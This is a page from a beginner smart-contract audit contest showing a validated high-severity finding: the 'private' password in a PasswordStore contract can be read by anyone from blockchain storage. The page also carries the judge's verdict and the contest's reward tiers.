First Flight #1: PasswordStore

First Flight #1

Beginner FriendlyFoundry

100 EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Everything on the blockchain is readable by everyone event PasswordStore::s_password

0xspryon

Summary

PasswordStore::s_password is accessible to anybody even if they are not the contract owner.

Vulnerability Details

As we know, the PasswordStore::s_password is stored in slot 2 of PasswordStore's storage. Anyone can just inspect the raw state of the blockchain and see what it is the contract owner stored.

Impact

If anyone can access the password stored by the contract author, this effectively breaks the assumption that only the contract owner can view his password as can be seen implemented in PasswordStore::getPassword.

Tools Used

Manual review

Recommendations

Somehow encrypt the password before saving it with PasswordStore::setPassword.

Updates

Lead Judging Commences

inallhonesty Lead Judge

almost 2 years ago

inallhonesty Lead Judge almost 2 years ago

Submission Judgement Published

Validated

Assigned finding tags:

finding-anyone-can-read-storage

Private functions and state variables are only visible for the contract they are defined in and not in derived contracts. In this case private doesn't mean secret/confidential

Rewards breakdown

nSLOC

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.